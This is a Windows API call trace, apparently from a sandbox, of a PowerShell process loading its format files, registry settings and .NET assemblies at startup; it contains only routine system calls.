	[0279.822] ReadFile (in: hFile=0x328, lpBuffer=0x3427de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3427de0*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.822] ReadFile (in: hFile=0x328, lpBuffer=0x3427de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3427de0*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.822] ReadFile (in: hFile=0x328, lpBuffer=0x3427de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3427de0*, lpNumberOfBytesRead=0x26d078*=0xfb2, lpOverlapped=0x0) returned 1
	[0279.823] ReadFile (in: hFile=0x328, lpBuffer=0x34274fa, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x34274fa*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0279.823] ReadFile (in: hFile=0x328, lpBuffer=0x3427de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3427de0*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0279.823] CloseHandle (hObject=0x328) returned 1
	[0279.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0279.823] SetErrorMode (uMode=0x1) returned 0x1
	[0279.823] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d020 | out: lpFileInformation=0x26d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0279.823] SetErrorMode (uMode=0x1) returned 0x1
	[0279.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0279.824] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d108 | out: phkResult=0x26d108*=0x328) returned 0x0
	[0279.824] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d08c, lpData=0x0, lpcbData=0x26d088*=0x0 | out: lpType=0x26d08c*=0x1, lpData=0x0, lpcbData=0x26d088*=0x56) returned 0x0
	[0279.824] CoTaskMemAlloc (cb=0x5a) returned 0x1b89b410
	[0279.824] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d05c, lpData=0x1b89b410, lpcbData=0x26d058*=0x56 | out: lpType=0x26d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d058*=0x56) returned 0x0
	[0279.824] CoTaskMemFree (pv=0x1b89b410) 
	[0279.824] RegCloseKey (hKey=0x328) returned 0x0
	[0279.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0279.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0279.826] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xedcd2775, Data2=0x3021, Data3=0x4ea1, Data4=([0]=0x8e, [1]=0x32, [2]=0xae, [3]=0x2, [4]=0x7c, [5]=0x27, [6]=0x74, [7]=0x8c))) returned 0x0
	[0279.828] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x461d1c3c, Data2=0xce20, Data3=0x4a91, Data4=([0]=0x92, [1]=0xb9, [2]=0x33, [3]=0x0, [4]=0xa8, [5]=0x8e, [6]=0x37, [7]=0x62))) returned 0x0
	[0279.829] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x917cceb6, Data2=0x152b, Data3=0x4d69, Data4=([0]=0x99, [1]=0x30, [2]=0x93, [3]=0x30, [4]=0xf4, [5]=0xb0, [6]=0x70, [7]=0x6d))) returned 0x0
	[0279.830] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xa821ab63, Data2=0xfa07, Data3=0x4222, Data4=([0]=0xa6, [1]=0xbe, [2]=0xcf, [3]=0x54, [4]=0x51, [5]=0xbd, [6]=0xe7, [7]=0x1))) returned 0x0
	[0279.830] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x73ecae85, Data2=0xfe38, Data3=0x4a7e, Data4=([0]=0xaf, [1]=0x34, [2]=0x7a, [3]=0x3, [4]=0x85, [5]=0x59, [6]=0xa7, [7]=0x3a))) returned 0x0
	[0279.831] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xfcc8fe19, Data2=0x74d8, Data3=0x4c81, Data4=([0]=0x9b, [1]=0x30, [2]=0x63, [3]=0x50, [4]=0xc3, [5]=0x1f, [6]=0xc8, [7]=0x90))) returned 0x0
	[0279.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.832] SetErrorMode (uMode=0x1) returned 0x1
	[0279.832] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0279.832] GetFileType (hFile=0x328) returned 0x1
	[0279.832] SetErrorMode (uMode=0x1) returned 0x1
	[0279.832] GetFileType (hFile=0x328) returned 0x1
	[0279.832] ReadFile (in: hFile=0x328, lpBuffer=0x3473b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3473b40*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.834] ReadFile (in: hFile=0x328, lpBuffer=0x3473b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3473b40*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.834] ReadFile (in: hFile=0x328, lpBuffer=0x3473b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3473b40*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.834] ReadFile (in: hFile=0x328, lpBuffer=0x3473b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3473b40*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.835] ReadFile (in: hFile=0x328, lpBuffer=0x3473b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3473b40*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.835] ReadFile (in: hFile=0x328, lpBuffer=0x3473b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3473b40*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0279.835] ReadFile (in: hFile=0x328, lpBuffer=0x3473b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3473b40*, lpNumberOfBytesRead=0x26d078*=0xaca, lpOverlapped=0x0) returned 1
	[0279.835] ReadFile (in: hFile=0x328, lpBuffer=0x3473172, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3473172*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0279.835] ReadFile (in: hFile=0x328, lpBuffer=0x3473b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3473b40*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0279.835] CloseHandle (hObject=0x328) returned 1
	[0279.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.836] SetErrorMode (uMode=0x1) returned 0x1
	[0279.836] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d020 | out: lpFileInformation=0x26d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0279.836] SetErrorMode (uMode=0x1) returned 0x1
	[0279.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.836] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d108 | out: phkResult=0x26d108*=0x328) returned 0x0
	[0279.836] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d08c, lpData=0x0, lpcbData=0x26d088*=0x0 | out: lpType=0x26d08c*=0x1, lpData=0x0, lpcbData=0x26d088*=0x56) returned 0x0
	[0279.837] CoTaskMemAlloc (cb=0x5a) returned 0x1b89b410
	[0279.837] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d05c, lpData=0x1b89b410, lpcbData=0x26d058*=0x56 | out: lpType=0x26d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d058*=0x56) returned 0x0
	[0279.837] CoTaskMemFree (pv=0x1b89b410) 
	[0279.837] RegCloseKey (hKey=0x328) returned 0x0
	[0279.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0279.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0279.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0279.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0279.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0279.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0279.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0279.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0279.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0279.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0280.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0280.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0280.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0280.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0280.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0280.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0280.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0280.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0280.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0280.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.075] VirtualQuery (in: lpAddress=0x26bba0, lpBuffer=0x26ca60, dwLength=0x30 | out: lpBuffer=0x26ca60*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.076] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x4b2dd5a4, Data2=0x26ad, Data3=0x4ca0, Data4=([0]=0xba, [1]=0xff, [2]=0xd4, [3]=0xc7, [4]=0x1e, [5]=0x5f, [6]=0x7e, [7]=0x6e))) returned 0x0
	[0281.077] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xd62599b, Data2=0x9e59, Data3=0x44f8, Data4=([0]=0xa4, [1]=0x85, [2]=0x40, [3]=0xfc, [4]=0xf6, [5]=0xd, [6]=0x64, [7]=0xc6))) returned 0x0
	[0281.078] VirtualQuery (in: lpAddress=0x26bd50, lpBuffer=0x26cc10, dwLength=0x30 | out: lpBuffer=0x26cc10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.079] VirtualQuery (in: lpAddress=0x26bd50, lpBuffer=0x26cc10, dwLength=0x30 | out: lpBuffer=0x26cc10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.080] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x159f0baa, Data2=0x485c, Data3=0x44ca, Data4=([0]=0x8d, [1]=0xd3, [2]=0xc8, [3]=0x87, [4]=0xac, [5]=0x7e, [6]=0x4c, [7]=0xc8))) returned 0x0
	[0281.083] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xb977aa38, Data2=0xef6b, Data3=0x409a, Data4=([0]=0x8d, [1]=0xed, [2]=0x60, [3]=0xf2, [4]=0x61, [5]=0xa8, [6]=0x9, [7]=0x3e))) returned 0x0
	[0281.084] VirtualQuery (in: lpAddress=0x26bfa0, lpBuffer=0x26ce60, dwLength=0x30 | out: lpBuffer=0x26ce60*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.084] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.085] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.085] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xe8d5dc05, Data2=0x6f80, Data3=0x42a3, Data4=([0]=0x89, [1]=0x2e, [2]=0x70, [3]=0xcd, [4]=0x70, [5]=0x82, [6]=0x9, [7]=0x88))) returned 0x0
	[0281.085] VirtualQuery (in: lpAddress=0x26bfa0, lpBuffer=0x26ce60, dwLength=0x30 | out: lpBuffer=0x26ce60*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.085] VirtualQuery (in: lpAddress=0x26bdc0, lpBuffer=0x26cc80, dwLength=0x30 | out: lpBuffer=0x26cc80*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.085] VirtualQuery (in: lpAddress=0x26b610, lpBuffer=0x26c4d0, dwLength=0x30 | out: lpBuffer=0x26c4d0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.086] VirtualQuery (in: lpAddress=0x26b610, lpBuffer=0x26c4d0, dwLength=0x30 | out: lpBuffer=0x26c4d0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0281.086] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x412fc6aa, Data2=0x715c, Data3=0x4aca, Data4=([0]=0x8b, [1]=0x24, [2]=0x2b, [3]=0x31, [4]=0x60, [5]=0xa, [6]=0xc3, [7]=0x48))) returned 0x0
	[0281.086] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xa9bce2e2, Data2=0x6ec6, Data3=0x4252, Data4=([0]=0x85, [1]=0x19, [2]=0xe9, [3]=0x9, [4]=0xdf, [5]=0xfe, [6]=0x57, [7]=0xfc))) returned 0x0
	[0281.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
